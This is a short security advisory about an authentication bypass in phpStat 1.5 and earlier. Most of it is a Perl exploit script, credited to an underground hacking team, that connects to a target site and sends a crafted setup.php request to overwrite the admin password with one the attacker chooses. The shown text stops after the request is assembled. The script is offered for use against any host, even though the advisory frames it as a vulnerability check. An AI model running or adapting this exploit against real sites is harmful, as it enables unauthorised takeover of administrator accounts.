Summary
phpStat is an "IM statistics generator, made using PHP. Along basic statistics it also organizes conversations for future access by their rightful owners."

phpStat is vulnerable to an authentication bypass vulnerability, the following exploit allows you to verify whether your system is vulnerable to the vulnerability or not.

Credit:
The information has been provided by A l p h a _ P r o g r a m m e r ( Sirus-v ).

Details
Vulnerable Systems:
* phpStat version 1.5 and prior

Exploit:
#!/usr/bin/perl
###################################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
###################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
###################################
# Gr33tz To => mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
###################################

use IO::Socket;

if (@ARGV < 3)
{
print "\n=====================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "=====================\n\n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";